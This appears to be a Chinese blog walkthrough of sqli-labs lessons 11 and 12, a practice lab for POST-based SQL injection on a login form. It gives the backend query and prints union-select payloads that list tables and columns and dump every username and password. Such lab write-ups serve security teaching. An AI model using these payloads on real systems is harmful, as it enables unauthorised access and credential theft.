sqli-labs Less-11 and Less-12

这关是post注入的世界,post注入就是表单中填好数据通常会被送到服务器,然后由服务器将其发送到它要去的地方(比如,送到一个服务器网关程序中,然后由这个程序对其进行处理)。

sqli-labs Less-11 and Less-12

不显示东西,那么加引号等一切简单的注入,发现他的sql查询语句是 select username,password from users where username='inputuname' and password='inputpass'

利用万能密码 (列举一些)

sqli-labs Less-11 and Less-12

sqli-labs Less-11 and Less-12

可以看出爆出来了数据,然后利用order by ,union select 可以进行简单的注入,可观察到有两个字段,接下来看图吧

sqli-labs Less-11 and Less-12

uname=1' union select database(),group_concat(table_name) from information_schema.tables where table_schema=database() #&passwd=123&submit=Submit

sqli-labs Less-11 and Less-12

uname=1' union select database(),group_concat(column_name) from information_schema.columns where table_schema=database() #&passwd=123&submit=Submit

sqli-labs Less-11 and Less-12

sqli-labs Less-11 and Less-12

uname=1' union select group_concat(username),group_concat(password) from users#&passwd=123&submit=Submit

sqli-labs Less-11 and Less-12

Less-12和Less-12不同的就是他的后台sql语句是select username,password from users where username=("inputuname") and password="(inputpass"),其他的和LEss-11一样,开启你的操作吧!

上一篇:PHP解决h5页面跨域


下一篇:在windows和linux下如何查看80端口占用情况?是被哪个进程占用?如何终止等